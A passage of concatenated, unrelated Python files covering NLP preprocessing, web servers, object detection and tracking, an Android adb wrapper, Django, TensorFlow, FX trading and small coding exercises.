normalize_digits)
output = " ".join([str(tok) for tok in token_ids]) + "\n"
file.write(output.encode('utf8'))
else:
print("Use exist file:", title_path)
print("Use exist file:", content_path)
# modified
def prepare_headline_generation_data(data_dir, vocabulary_size, oov_size, sentence_truncate=None, tokenizer=None):
"""Get WMT data into data_dir, create vocabularies and tokenize data.
Args:
data_dir: directory in which the data sets will be stored.
vocabulary_size: size of the vocabulary to create and use.
oov_size: oov_size out of vocabulary, it is used for keeping unknown words in the inputs
sentence_truncate: number of sentence selected from the begining of the article
tokenizer: a function to use to tokenize each data sentence;
if None, basic_tokenizer will be used.
Returns:
A tuple of 6 elements:
(1) path to the token-ids for English training data-set,
(2) path to the token-ids for French training data-set,
(3) path to the token-ids for English development data-set,
(4) path to the token-ids for French development data-set,
(5) path to the English vocabulary file,
(6) path to the French vocabulary file.
"""
train_content_path = os.path.join(data_dir, "train_content")
train_title_path = os.path.join(data_dir, "train_title")
evl_content_path = os.path.join(data_dir, "evl_content")
evl_title_path = os.path.join(data_dir, "evl_title")
train_json_path = '../../sample_data/train.jsonl'
evl_json_path = '../../sample_data/test.jsonl'
if gfile.Exists(train_json_path):
# Create vocabularies of the appropriate sizes.
vocab_path = os.path.join(data_dir, "vocab_%d" % vocabulary_size)
create_vocabulary(vocab_path, train_json_path, evl_json_path,
vocabulary_size, oov_size, sentence_truncate, tokenizer)
# Create token ids for the training data.
train_content_ids_path = train_content_path + (".ids_%d" % vocabulary_size)
train_title_ids_path = train_title_path + (".ids_%d" % vocabulary_size)
data_to_token_ids(train_json_path, train_title_ids_path, train_content_ids_path, vocab_path, oov_size, sentence_truncate, tokenizer)
# Create token ids for the development data.
evl_content_ids_path = evl_content_path + (".ids_%d" % vocabulary_size)
evl_title_ids_path = evl_title_path + (".ids_%d" % vocabulary_size)
data_to_token_ids(evl_json_path, evl_title_ids_path, evl_content_ids_path, vocab_path, oov_size, sentence_truncate, tokenizer)
return (train_content_ids_path, train_title_ids_path,
evl_content_ids_path, evl_title_ids_path,
vocab_path)
else:
raise ValueError("Vocabulary file %s not found.", train_content_path)
def get_glove_embedding_matrix(glove_name, embedding_dim):
with open(glove_name) as f:
glove_n_symbols = sum(1 for _ in f)
# Get glove word to vector
glove_index_dict = {}
glove_embedding_weights = np.empty((glove_n_symbols, embedding_dim))
globale_scale = .1
with open(glove_name, 'r') as fp:
i = 0
for l in fp:
l = l.strip().split()
w = l[0] # word
glove_index_dict[w] = i # word to index of glove_embedding_weights
glove_embedding_weights[i, :] = map(float, l[1:]) # Save the vector to indexed raw
i += 1
# glove word vectors
glove_embedding_weights *= globale_scale
return glove_index_dict, glove_embedding_weights
def get_word_embedding_from_valcabulary(glove_index_dict, glove_embedding_weights, idx2word, embedding_dim, vocab_size):
'''
:param glove_index_dict: word to index of glove_embedding_weights (40,000, 300)
:param glove_embedding_weights: word vectors
:param idx2word: mapping from index to word (voc_size,)
:param vocab_size: vocabulary size
:return:
embedding: word vectors of the vocabulary (For word in the glove, use it. For word not in the glove, use random.uniform)
glove_idx2idx: word that not in the glove, map to similar word that in the glove
'''
# generate random embedding with same scale as glove
# give vector a simulated values in case couldn't find record in glove
seed = 42
np.random.seed(seed)
shape = (vocab_size, embedding_dim)
print("debug: in get_word_embedding_from_valcabulary(): word embedding shape", shape)
scale = glove_embedding_weights.std() * np.sqrt(12) / 2 # uniform and not normal
embedding = np.random.uniform(low=-scale, high=scale, size=shape)
# copy from glove weights of words that appear in our short vocabulary (idx2word)
c = 0
for i in range(vocab_size):
# index to word
w = idx2word[i]
# word to vector
g = glove_index_dict.get(w, glove_index_dict.get(w.lower()))
if g is None and w.startswith('#'): # glove has no hastags (I think...)
w = w[1:]
g = glove_index_dict.get(w, glove_index_dict.get(w.lower()))
if g is not None:
# save vector in embedding
embedding[i, :] = glove_embedding_weights[g, :]
c += 1
return embedding
import pickle
def get_glove_embedding(vocab_path, embedding_path, glove_dir, size, source_vocab_size):
embedding = None
if gfile.Exists(embedding_path):
# load word embeddings
with open(embedding_path, 'rb') as fp:
embedding = pickle.load(fp)
else:
_, rev_vocab = initialize_vocabulary(vocab_path)
glove_index_dict, glove_embedding_weights = get_glove_embedding_matrix(glove_dir, size)
# Use glove matrix to create a word embedding matrix of our vocabulary
embedding = get_word_embedding_from_valcabulary(glove_index_dict, glove_embedding_weights,
rev_vocab, size, source_vocab_size)
# Save word embedding into a pickle file
with open(embedding_path, 'wb') as fp:
pickle.dump((embedding), fp, -1)
return embedding
def main():
print("Preprocess initialiated...")
data_dir = "../sample_data"
raw_train_path = '../../sample_data/train.jsonl'
raw_val_path = '../../sample_data/test.jsonl'
train_content_path = os.path.join(data_dir, "train_content")
train_title_path = os.path.join(data_dir, "train_title")
evl_content_path = os.path.join(data_dir, "evl_content")
evl_title_path = os.path.join(data_dir, "evl_title")
sentence_trunctate = 5
create_text_data(raw_train_path, train_content_path, train_title_path, sentence_trunctate, spacy_tokenizer)
create_text_data(raw_val_path, evl_content_path, evl_title_path, sentence_trunctate, spacy_tokenizer)
# with gfile.GFile(train_content_path, mode="rb") as f:
# for line in f:
# print(line.decode("utf8"))
if __name__ == "__main__":
main()
|
#!/usr/bin/env python3
"""
A simple web server made using Tornado.
It serves the basic webpage located in this file's folder.
For reading on the structure of a Tornado web application read:
http://www.tornadoweb.org/en/stable/guide/structure.html
It works sort of like this:
The Application object is what manages routing the routing table and global config.
It maps requests such as / to certain handlers
"""
import os # Used to get proper paths to static/template folders
import tornado.httpserver # Default http server
import tornado.ioloop # Not sure
import tornado.options # Used for settings
import tornado.web # Contains Application / RequestHandler classes
# Tell template renderer where html, css, and js are located
TEMPLATE_PATH = os.path.join(os.path.dirname(__file__), "templates")
STATIC_PATH = os.path.join(os.path.dirname(__file__), "static")
class Application(tornado.web.Application):
def __init__(self):
handlers = [
(r"/", IndexHandler)
]
settings = dict(
template_path = TEMPLATE_PATH,
static_path = STATIC_PATH
)
# **settings is called keyword argument unpacking.
# f(**settings) -> f(template_path=blah, static_path=bleh)
tornado.web.Application.__init__(self, handlers, **settings)
# A basic hander for requests to "/".
# This renders index.html. Render looks by default inside the "templates"
# folder, which was specified in the settings in Application.
# Because it is templated for the css and js, they are "rendered" as well
class IndexHandler(tornado.web.RequestHandler):
def get(self):
self.render('index.html')
# Make an http server that serves our application to the provided port.
def main():
httpServer = tornado.httpserver.HTTPServer(Application())
httpServer.listen(8888)
tornado.ioloop.IOLoop.current().start()
if __name__ == "__main__":
main()
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from opts import opts
from detectors.detector_factory import detector_factory
import os
import cv2
import numpy as np
import sys
CENTERNET_PATH = 'CENTERNET_PATH/deep-sort-plus-pytorch/CenterNet/src/lib/'
sys.path.insert(0, CENTERNET_PATH)
image_ext = ['jpg', 'jpeg', 'png', 'webp']
video_ext = ['mp4', 'mov', 'avi', 'mkv']
time_stats = ['tot', 'load', 'pre', 'net', 'dec', 'post', 'merge']
def demo(opt):
os.environ['CUDA_VISIBLE_DEVICES'] = opt.gpus_str
opt.debug = max(opt.debug, 1)
Detector = detector_factory[opt.task]
detector = Detector(opt)
if opt.demo == 'webcam' or \
opt.demo[opt.demo.rfind('.') + 1:].lower() in video_ext:
cam = cv2.VideoCapture(0 if opt.demo == 'webcam' else opt.demo)
detector.pause = False
while True:
_, img = cam.read()
cv2.imshow('input', img)
ret = detector.run(img)
time_str = ''
for stat in time_stats:
time_str = time_str + '{} {:.3f}s |'.format(stat, ret[stat])
print(time_str)
if cv2.waitKey(1) == 27:
return # esc to quit
else:
if os.path.isdir(opt.demo):
image_names = []
ls = os.listdir(opt.demo)
for file_name in sorted(ls):
ext = file_name[file_name.rfind('.') + 1:].lower()
if ext in image_ext:
image_names.append(os.path.join(opt.demo, file_name))
else:
image_names = [opt.demo]
person_id = 1
seq_no = 1
#line = []
detector.pause = False
for (image_name) in image_names:
ret = detector.run(image_name)
bbox = ret['results'][person_id]
# change xyxy to xywh
bbox[:, 2] = bbox[:, 2] - bbox[:, 0]
bbox[:, 3] = bbox[:, 3] - bbox[:, 1]
# output detection box
#line = [seq_no , -1]
for data in bbox:
#line.append(np.concatenate(([seq_no, 1], data, [-1,-1,-1])))
opt.det_result_file.write("%d,-1, %f, %f, %f, %f, %f, -1,-1,-1\n" % (
seq_no, data[0], data[1], data[2], data[3], data[4]))
#opt.det_result_file.write("%s\n" % line.tolist())
time_str = ''
for stat in time_stats:
time_str = time_str + '{} {:.3f}s |'.format(stat, ret[stat])
print(time_str)
seq_no += 1
# close
opt.det_result_file.close()
if __name__ == '__main__':
MODEL_PATH = './CenterNet/models/ctdet_coco_dla_2x.pth'
ARCH = 'dla_34'
# MODEL_PATH = './CenterNet/models/ctdet_coco_resdcn18.pth'
# ARCH = 'resdcn_18'
TASK = 'ctdet' # or 'multi_pose' for human pose estimation
opt = opts().init('{} --load_model {} --arch {}'.format(TASK, MODEL_PATH, ARCH).split(' '))
seq_path = '../data/2DMOT17det/test/MOT17-{0:02d}/img1/'
det_result_path = './det_results/MOT17-{}.txt'
start_seq = 1
end_seq = 14
# generate box, conf file
# f = open('../det_results')
for i in range(start_seq, end_seq + 1):
opt.demo = seq_path.format(i)
if os.path.isdir(opt.demo):
opt.det_result_file = open(det_result_path.format(i), 'w')
demo(opt)
|
# -*- coding:utf-8 -*-
import subprocess
import sys
sys.path.append('..')
import lib.Utils as U
import os
import re
class adb():
def __init__(self,device=''):
if device =='':
self.device = ''
else:
self.device = "-s %s" % device
def adb(self,args):
return U.cmd('adb %s %s' % (self.device,str(args)))
def logcat(self,log_path):
return self.adb('logcat -v time > %s&' % log_path)
def logcat_c(self):
return self.adb('logcat -c')
def shell(self,args):
cmd = 'adb %s shell %s' %(self.device,str(args))
return U.cmd(cmd)
def connect(self,device):
device = device.split(':')[0]
return U.cmd('adb connect %s' % device)
def get_cpu(self,package_name):
p = self.shell('top -n 1 -d 0.5 | findstr %s' % package_name)
while True:
r = p.stdout.readline().strip().decode('utf-8')
if r.endswith(package_name):
lst = []
for i in r.split(' '):
if i:
lst.append(i)
return int(lst[2].split('%',1)[0])
def get_current_app_mem(self,package_name):
p = self.shell('top -n 1 -d 0.5 | findstr %s' % package_name)
while True:
r = p.stdout.readline().strip().decode('utf-8')
if r.endswith(package_name):
lst = []
for i in r.split(' '):
if i:
lst.append(i)
return int(lst[6].split('K')[0])
def get_total_mem(self):
p = self.shell('cat proc/meminfo')
while True:
r = p.stdout.readline().strip().decode('utf-8')
if r and 'MemTotal' in r:
lst = []
for i in r.split(' '):
if i:
lst.append(i)
return int(lst[1])
def get_mem(self,package_name):
try:
return int(self.get_current_app_mem(package_name) / float(self.get_total_mem())*100)
except:
return None
def get_sceenshot(self,screen_file):
os.system('adb %s shell screencap -p /data/local/tmp/screencap.png' % self.device)
os.system('adb %s pull /data/local/tmp/screencap.png %s' %(self.device,screen_file))
return screen_file
def get_app_version(self,packageName):
for line in self.shell('dumpsys package %s' % packageName).stdout.readlines():
if 'versionName' in line:
return line.split('=',2)[1].strip()
def get_device_name(self):
t = self.shell('getprop ro.product.model').stdout.readlines()
return ''.join(t).strip()
def get_disk(self):
for s in self.shell('df').stdout.readlines():
if '/data' in s:
lst=[]
for i in s.split(' '):
if i:
lst.append(i)
return 'Used:%s, Free:%s' % (lst[2],lst[3])
def get_wifi_name(self):
for line in self.shell('dumpsys wifi').stdout.readlines():
if line.startswith('mWifiInfo'):
wifi_name = re.findall(r'SSID:([^"]+), BSSID',line)
if not wifi_name:
return None
else:
return wifi_name[0].strip()
def get_android_version(self):
return self.shell('getprop ro.build.version.release').stdout.read().strip()
def get_screen_resolution(self):
pattern = re.compile(r"\d+")
out = self.shell("dumpsys display | findstr PhysicalDisplayInfo" ).stdout.read()
display = pattern.findall(out)
if display:
return int(display[0]),int(display[1])
else:
return 1920,1080
if __name__ == '__main__':
s = adb('192.168.1.100:5555')
print s.get_screen_resolution()
|
# coding=utf-8
from PIL import Image, ImageSequence
import sys, os
from PIL.ImageDraw import ImageDraw
from PIL.ImageFont import truetype
outputdir = "test/Arch_sigmaS/"
#Read images and IQA
images = {float(x[0:len(x)-4]): os.path.join(outputdir, x) for x in os.listdir(outputdir) if x.lower().endswith("png")}
#iqas = {x: float(open(y+"_iqa.txt", 'r').read()) for x,y in images.iteritems()}
images = {x: Image.open(y) for x,y in images.iteritems()}
#Annotate images
def annotate(image, text):
draw = ImageDraw(image)
font = truetype("Helvetica.otf", 16)
draw.text((0, 0), text, (255, 255, 255), font=font)
idx = 0
for x in sorted(images.keys()):
annotate(images[x], "sigmaS="+str(x))#+";IQA="+str(iqas[x]))
images[x].save(os.path.join(outputdir, str(idx).zfill(4)+"_annotated.png"))
idx += 1
os.system("convert -delay 100 "+str(outputdir)+"*_annotated.png "+str(outputdir)+"animated.gif")
os.system("rm " + str(outputdir) + "*_annotated.png") |
# encoding: utf-8
import cherrypy
from Residencia import * # @UnusedWildImport
import threading as t # @UnusedWildImport
class ServerPrincipal:
def __init__(self, residence):
self.residence = residence
def index(self):
return "Welcome to Control multimedia Universal!"
index.exposed = True
def default(self): # isso eh tipo uma excecao
return "Invalid Data"
default.exposed = True # deixa o metodo visivel no server
@cherrypy.tools.allow(methods=['POST'])
def addRoom(self, nameRoom, ip, port):
if(self.residence.addRoom(nameRoom, ip, port)):
return "Comodo adicionado"
else:
return "Comodo já existe"
addRoom.exposed = True
@cherrypy.tools.allow(methods=['POST'])
def removeRoom(self, nameRoom):
if (self.residence.removeRoom(nameRoom)):
return "Comodo removido"
else:
return "Comodo nao existe"
removeRoom.exposed = True
@cherrypy.tools.allow(methods=['POST'])
def sendCommand(self, nameRoom, equipment, command):
return self.residence.sendCommand(nameRoom, equipment, command)
sendCommand.exposed = True
@cherrypy.tools.allow(methods=['POST'])
def setRoomOfControl(self, nameRoom):
return self.residence.setRoomOfControl(nameRoom)
setRoomOfControl.exposed = True
def getRooms(self):
return "|".join(self.residence.getRooms())
getRooms.exposed = True
def powerOffEquipmentsRoom(self):
return self.residence.powerOffEquipmentsRoom()
powerOffEquipmentsRoom.exposed = True
residence = Residencia()
class MyThread(t.Thread):
def run(self):
residence.powerOffEquipmentsRoom()
mt = MyThread()
mt.start()
cherrypy.config.update("config.cfg")
cherrypy.quickstart(ServerPrincipal(residence))
|
# -*- coding: utf-8 -*-
from pynginx.schedule.base import Schedule as BaseSchedule
import time
from pynginx.client.stream import Stream
class Schedule(BaseSchedule):
def index(self,value):
if self.lock.acquire():
if 0 == self.length:
self.lock.release()
return -1
return 0
def get(self,value):
sock = None
while True:
i = self.index(value)
while -1 == i:
# 如果没有可用server,则会一直等待了。
print 'wait for server'
time.sleep(self.interval)
i = self.index(value)
host,port = self.cache[i]
print host,port
try:
sock = Stream(host,port).sock
except:
self.delete((host,port))
continue
break
return sock
|
from pathlib import Path
TEMPLATE = "\\input{{{0}}}"
PATH_TEXT = Path("src/text")
def merge_text_files(text, filenames):
"""Merge tex files"""
for filename in filenames:
path = filename.parent.relative_to(PATH_TEXT.parent)
file = str(path) + "/" + filename.stem
template = TEMPLATE.format(file)
with open(filename, "r") as f_sub:
file_content = f_sub.read()
text = text.replace(template, file_content)
return text
if __name__ == "__main__":
with (PATH_TEXT / "../ms.tex").open("r") as f:
text = f.read()
filenames = PATH_TEXT.glob("*.tex")
text = merge_text_files(text=text, filenames=filenames)
filenames = (PATH_TEXT / "2-package-subsections").glob("*.tex")
text = merge_text_files(text=text, filenames=filenames)
filenames = (PATH_TEXT / "3-applications-subsections").glob("*.tex")
text = merge_text_files(text=text, filenames=filenames)
path = PATH_TEXT / ".."
path.mkdir(exist_ok=True)
with (path / "ms-review.tex").open("w") as f:
f.write(text)
|
import pandas as pd
import numpy as np
import cv2
import os
import glob
import sys
import subprocess
from matplotlib import cm
def smooth_track(track_data):
res = []
for track_id in track_data['track_id'].unique():
tid = track_data[track_data['track_id'] == track_id]
if len(tid) > 12:
tid['x'] = smooth_(tid['x'])
tid['y'] = smooth_(tid['y'])
tid['width'] = smooth_(tid['width'])
tid['height'] = smooth_(tid['height'])
res.append(tid)
if len(res) > 0:
return pd.concat(res)
else:
return []
def smooth_(x, window_len=12, window='hanning'):
"""smooth the data using a window with requested size.
This method is based on the convolution of a scaled window with the signal.
The signal is prepared by introducing reflected copies of the signal
(with the window size) in both ends so that transient parts are minimized
in the begining and end part of the output signal.
input:
x: the input signal
window_len: the dimension of the smoothing window; should be an odd integer
window: the type of window from 'flat', 'hanning', 'hamming', 'bartlett', 'blackman'
flat window will produce a moving average smoothing.
output:
the smoothed signal
example:
t=linspace(-2,2,0.1)
x=sin(t)+randn(len(t))*0.1
y=smooth(x)
see also:
numpy.hanning, numpy.hamming, numpy.bartlett, numpy.blackman, numpy.convolve
scipy.signal.lfilter
TODO: the window parameter could be the window itself if an array instead of a string
NOTE: length(output) != length(input), to correct this: return y[(window_len/2-1):-(window_len/2)] instead of just y.
"""
if x.ndim != 1:
raise ValueError("smooth only accepts 1 dimension arrays.")
if x.size < window_len:
raise ValueError("Input vector needs to be bigger than window size.")
if window_len < 3:
return x
if not window in ['flat', 'hanning', 'hamming', 'bartlett', 'blackman']:
raise ValueError("Window is on of 'flat', 'hanning', 'hamming', 'bartlett', 'blackman'")
# x = numpy.pad(x, int(window_len/2), 'reflect')
s = np.r_[x[window_len - 1:0:-1], x, x[-2:-window_len - 1:-1]]
# print(len(s))
if window == 'flat': # moving average
w = np.ones(window_len, 'd')
else:
w = eval('np.' + window + '(window_len)')
y = np.convolve(w / w.sum(), s, mode='valid')
return y[(window_len // 2 - 1):-(window_len // 2)]
def get_frame_rate(filename):
if not os.path.exists(filename):
sys.stderr.write("ERROR: filename %r was not found!" % (filename,))
return -1
out = subprocess.check_output(
["ffprobe", filename, "-v", "0", "-select_streams", "v", "-print_format", "flat", "-show_entries",
"stream=r_frame_rate"])
rate = str(out).split('=')[1].strip()[1:-4].split('/')
if len(rate) == 1:
return float(rate[0])
if len(rate) == 2:
return float(rate[0]) / float(rate[1])
return -1
def frames2vid(frames_dir, video_fp, suffix=''):
fps = get_frame_rate(video_fp)
exp_video = os.path.join(frames_dir, 'out.mp4')
exp_audio_video = os.path.join(frames_dir, video_fp.replace('.mp4', f'{suffix}.mp4'))
cmd = 'ffmpeg -y -r {} -start_number 1 -i {}/%06d.jpg -c:v libx264 -vf fps={} -pix_fmt yuv420p {}'.format(fps,
frames_dir,
fps,
exp_video)
process = subprocess.Popen(cmd.split(), stdout=subprocess.PIPE)
process.communicate()
audio_cmd = 'ffmpeg -y -i %s -vn -ab 256 tmp.mp3' % video_fp
process = subprocess.Popen(audio_cmd.split(), stdout=subprocess.PIPE)
process.communicate()
replace_audio = 'ffmpeg -y -i %s -i %s -c:v copy -map 0:v:0 -map 1:a:0 %s' % (exp_video, 'tmp.mp3', exp_audio_video)
process = subprocess.Popen(replace_audio.split(), stdout=subprocess.PIPE)
process.communicate()
os.remove('tmp.mp3')
def write_tracks(track_data, frame_dir, width, height, conf=False, action_data=None):
acc_replace = {'crack_nut': 'NUT CRACK', 'eating': 'EAT', 'Drumming': 'DRUM'}
prev_id = -1
colormap = [cm.Pastel1.__dict__['colors'][idx] for idx in range(9)]
for idx, row in track_data.iterrows():
curr_id = '%06d.jpg' % (row['frame_id'])
if prev_id != curr_id:
img = cv2.imread(os.path.join(frame_dir, curr_id))
try:
acc_height, acc_width = img.shape[:2]
except:
import pdb; pdb.set_trace()
# height_s = acc_height / height
# width_s = acc_width / width
height_s = height
width_s = width
prev_id = curr_id
track_id = row['track_id'] + 1
if track_id != -1:
if conf:
color = colormap[int(track_id * 8)]
else:
color = colormap[track_id % 9]
color = [c * 255 for c in color]
im_x, im_y, im_w, im_h = int(row['x']), int(row['y']), int(
row['width']), int(row['height'])
cv2.rectangle(img, (im_x, im_y), (im_x + im_w, im_y + im_h), color, 2)
if action_data is None:
text_width, text_height = \
cv2.getTextSize(str(track_id), cv2.FONT_HERSHEY_SIMPLEX, fontScale=1, thickness=1)[0]
tbox_coords = ((im_x + im_w - text_width + 4, im_y), (im_x + im_w, im_y - text_height - 4))
cv2.rectangle(img, tbox_coords[0], tbox_coords[1], color, cv2.FILLED)
cv2.putText(img, str(track_id), (im_x + im_w - text_width + 4, im_y), cv2.FONT_HERSHEY_SIMPLEX, 1,
(0, 0, 0), lineType=cv2.LINE_AA)
if action_data is not None:
adf = action_data[action_data['f1'] <= row['frame_id']]
adf = adf[adf['f2'] >= row['frame_id']]
adf = adf[adf['indiv_id'] == row['indiv_id']]
if len(adf) > 0:
action_text = acc_replace[adf['action'].iloc[0]]
text_width, text_height = \
cv2.getTextSize(action_text, cv2.FONT_HERSHEY_SIMPLEX, fontScale=1, thickness=1)[0]
tbox_coords = ((im_x, im_y - 2), (im_x + text_width + 4, im_y - text_height - 4))
cv2.rectangle(img, tbox_coords[0], tbox_coords[1], (255, 255, 255), cv2.FILLED)
cv2.putText(img, action_text, (im_x + 2, im_y - 4), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 0),
lineType=cv2.LINE_AA)
cv2.imwrite(os.path.join(frame_dir, curr_id), img)
cv2.imwrite(os.path.join(frame_dir, curr_id), img)
def create_det_vid(csv_fp, frame_video_dir, video_fp, smooth=True):
data = pd.read_csv(csv_fp)
data.sort_values('frame_id', inplace=True)
if smooth:
data = smooth_track(data)
imgs_dir = os.path.join(frame_video_dir, '*.jpg')
img_ex = cv2.imread(glob.glob(imgs_dir)[0])
height, width = img_ex.shape[:2]
write_tracks(data, frame_video_dir, width, height)
frames2vid(frame_video_dir, video_fp)
#for file in glob.glob(os.path.join(frame_video_dir, '*.jpg')):
# os.remove(file)
if __name__ == "__main__":
create(
"results/tmp/19_mini.mp4.full.csv",
"tmp/19_mini.mp4",
"19_mini.mp4"
) |
from django.db import models
# Create your models here.
class Lawning(models.Model):
instructor_name = models.CharField(max_length = 100)
part_name = models.CharField(max_length = 100)
#partname is participants name
images = models.ImageField(upload_to = "pics")
category = models.TextField()
started_from =models.DateField('started_from')
#nb:after creating your models go to pgadmin
#create a database with your project name them makemigrations |
from django.contrib import admin
from django.urls import path
from django.conf.urls import url, include
from django.contrib import admin
# add media url
from django.conf import settings
from django.conf.urls.static import static
# Django Rest Framework
from rest_framework import routers
from rest_framework_swagger.views import get_swagger_view
from api import views
app_name = 'server'
router = routers.DefaultRouter()
router.register('users', views.UserViewSet)
router.register('profiles', views.ProfileViewSet)
router.register('videos', views.VideoViewSet)
urlpatterns = [
path('admin/', admin.site.urls),
path('main/doc', get_swagger_view(title='Tape Viedo API')),
path('main/video', include(router.urls)),
path('login', views.login),
path('signup', views.signup),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
|
from dann_utils import *
import tensorflow as tf
class BcnnModel(object):
"""Simple MNIST Bilinear CNN Model -- Two CNN Network, Two CNN Data Stream!!!!!!"""
def __init__(self, batch_size, pixel_mean):
self.pixel_mean = pixel_mean
self.batch_size = batch_size
self._build_model()
def _build_model(self):
self.X = tf.placeholder(tf.uint8, [None, 28, 28, 3])
self.y = tf.placeholder(tf.float32, [None, 10])
X_input = (tf.cast(self.X, tf.float32) - self.pixel_mean) / 255.
# CNN model for feature extraction
with tf.variable_scope('feature_extractor1'):
W_conv0 = weight_variable([5, 5, 3, 32])
b_conv0 = bias_variable([32])
h_conv0 = tf.nn.relu(conv2d(X_input, W_conv0) + b_conv0)
h_pool0 = max_pool_2x2(h_conv0)
W_conv1 = weight_variable([5, 5, 32, 48])
b_conv1 = bias_variable([48])
h_conv1 = tf.nn.relu(conv2d(h_pool0, W_conv1) + b_conv1)
self.h_pool1 = max_pool_2x2(h_conv1)
with tf.variable_scope('feature_extractor2'):
W_conv0 = weight_variable([5, 5, 3, 32])
b_conv0 = bias_variable([32])
h_conv0 = tf.nn.relu(conv2d(X_input, W_conv0) + b_conv0)
h_pool0 = max_pool_2x2(h_conv0)
W_conv1 = weight_variable([5, 5, 32, 48])
b_conv1 = bias_variable([48])
h_conv1 = tf.nn.relu(conv2d(h_pool0, W_conv1) + b_conv1)
self.h_pool2 = max_pool_2x2(h_conv1)
# Bilinear vector for class prediction
with tf.variable_scope('label_predictor'):
conv0 = tf.transpose(self.h_pool1, perm=[0, 3, 1, 2])
conv0_1 = tf.transpose(self.h_pool2, perm=[0, 3, 1, 2])
conv0 = tf.reshape(conv0, [-1, 48, 14 * 14])
conv0_1 = tf.reshape(conv0_1, [-1, 48, 14 * 14])
conv0_1_T = tf.transpose(conv0_1, [0, 2, 1])
phi_I = tf.matmul(conv0, conv0_1_T)
phi_I = tf.rehsape(phi_I, [-1, 48 * 48])
phi_I = tf.divide(phi_I, 196.0)
y_sqrt = tf.multiply(tf.sign(phi_I), tf.sqrt(tf.abs(phi_I) + 1e-12))
z_l2 = tf.nn.l2_normalize(y_sqrt, dim=1)
W_fc0 = weight_variable([48 * 48, 100])
b_fc0 = bias_variable([100])
h_fc0 = tf.nn.relu(tf.matmul(z_l2, W_fc0) + b_fc0)
W_fc1 = weight_variable([100, 100])
b_fc1 = bias_variable([100])
self.visual_feature = tf.matmul(h_fc0, W_fc1) + b_fc1
h_fc1 = tf.nn.relu(tf.matmul(h_fc0, W_fc1) + b_fc1)
W_fc2 = weight_variable([100, 10])
b_fc2 = bias_variable([10])
logits = tf.matmul(h_fc1, W_fc2) + b_fc2
self.pred = tf.nn.softmax(logits)
# print(logits, self.classify_labels)
self.pred_loss = tf.nn.softmax_cross_entropy_with_logits(labels=self.classify_labels, logits=logits)
|
#!/usr/bin/env python3
import fxcmpy
import sys
import re
import os
from time import sleep
from modules.instrument import Instrument
from modules.color import colors
fx = None
def main():
fx = fxcmpy.fxcmpy(config_file="./config/fxcm.cfg")
print("Connection to FXCM etablished")
if '--dev' in sys.argv:
try:
Instrument("EUR/USD", fx)
print("[" + colors.OK + " OK " + colors.DEF + "] Initializing class for EUR/USD")
except:
fx.close()
sys.exit(1)
else:
instruments = fx.get_instruments()
for i in instruments[0:5]:
if re.compile("[A-Z]{3}\/[A-Z]{3}").match(i):
try:
Instrument(i, fx)
print("[" + colors.OK + " OK " + colors.DEF + "] Initializing class for {}".format(i))
except:
print("[" + colors.FAIL + " KO " + colors.DEF + "] Initializing class for {}".format(i))
sys.exit(1)
while True:
None
fx.close()
if __name__ == '__main__':
try:
main()
except:
print(colors.FAIL + "An unhandled error occured.\nAborting." + colors.DEF)
if fx:
fx.close()
sys.exit(1)
|
#!/usr/bin/env python3
def add(num1,num2=0):
return num1 + num2
def subtract(num1,num2=0):
return num1 - num2
def divide(num1,num2=1):
return num1 / num2
def multiply(num1,num2=1):
return num1 * num2
def main():
val1 = 1
val2 = 1
print("Welcome to Primitive Calculator ..... \n")
while True:
while True:
try :
oper1 = int(input("Enter 1st Operand (Default = 1) >>> "))
val1 = oper1
break
except ValueError :
if UnboundLocalError :
val1 = 1
break
else :
print("Only integer values allowed ... remember I am 'Primitive' ... Ha ha ha ha")
while True:
action = input("Choose Operator Add/Subtract/Multiply/Divide >>> ")
if action.lower().strip() not in [ 'add','subtract','multiply','divide' ] :
print("Invalid Operation requested, try again")
else :
break
while True:
try :
oper2 = int(input("Enter 2nd Operand (Default = 1) >>> "))
val2 = oper2
break
except ValueError :
if UnboundLocalError :
val2 = 1
break
else :
print("Only integer values allowed ... remember I am 'Primitive' ... Ha ha ha ha")
break
if action.lower().strip() == "add" : print(f"{val1} + {val2} = {add(val1,val2)}")
if action.lower().strip() == "subtract" : print(f"{val1} - {val2} = {subtract(val1,val2)}")
if action.lower().strip() == "divide" : print(f"{val1} / {val2} = {divide(val1,val2)}")
if action.lower().strip() == "multiply" : print(f"{val1} * {val2} = {multiply(val1,val2)}")
main()
|
"""Instacart customers are able to set the delivery window during which they want to receive their groceries. There are always plenty of shoppers in the area ready to take a customer's order, but unfortunately they can't always do it right away. Before taking an order a shopper wants to ensure they will make it in time. They also don't want to stay idle, so arriving early isn't an option either.
Our task is to implement an algorithm that determines whether shoppers should take the given order or not.
For each shopper you know their travel speed, distance to the store and the estimated amount of time they will spend there. Figure out which of them can take the order, assuming it is known when the customer wants to receive the groceries and the distance between their house and the store.
Example
For order = [200, 20, 15] and shoppers = [[400, 50, 5], [600, 40, 10]]
the answer is delivery(order, shoppers) = [false, true].
The store is located 200 m away from the customer's house.
The customer will be ready to receive the groceries in 20 minutes, but they shouldn't be delivered more than 15 minutes late.
The first shopper is 400 m away from the store, his speed is 50 m/min, and he will spend 5 minutes in the store, which means that he will need (400 + 200) / 50 + 5 = 17 minutes to fulfill the order. This will leave him with 20 - 17 = 3 idle minutes, so he shouldn't take the order.
The second shopper is 600 m away from the store, his speed is 40 m/min, and he will spend 10 minutes in the store, which means it will take him (600 + 200) / 40 + 10 = 30 minutes to fulfill the order. The customer can wait for 20 + 15 = 35 minutes, which means that the shopper will make it in time.
[input] array.integer order
The order is given as an array of 3 positive integers. order[0] is the distance from the customer's home to the store in meters, order[1] is the time by which the customer will be ready to receive the delivery in minutes, and order[2] is the number of minutes they are willing to wait.
[input] array.array.integer shoppers
Each element of this array represents a shopper. For each shopper three positive integers are stored in the exact given order: their distance from the shop in meters, their speed in meters per minute and the estimated time they will spend in the store in minutes.
[output] array.boolean
For each shopper return if they should take the order or not."""
def delivery(order, shoppers):
cust_distance = order[0]
time = order[1]
waiting = order[2]
maxtime = time+waiting
boollist = []
for elem in shoppers:
totaldist = elem[0]+cust_distance
totaltime = totaldist/elem[1] + elem[2]
if totaltime <maxtime and totaltime >= time:
boollist.append(True)
else:
boollist.append(False)
return boollist |
#!/usr/bin/env /data/mta/Script/Python3.8/envs/ska3-shiny/bin/python
#############################################################################################
# #
# ccd_plot_history.py: create various history plots for warm pixels and warm columns #
# #
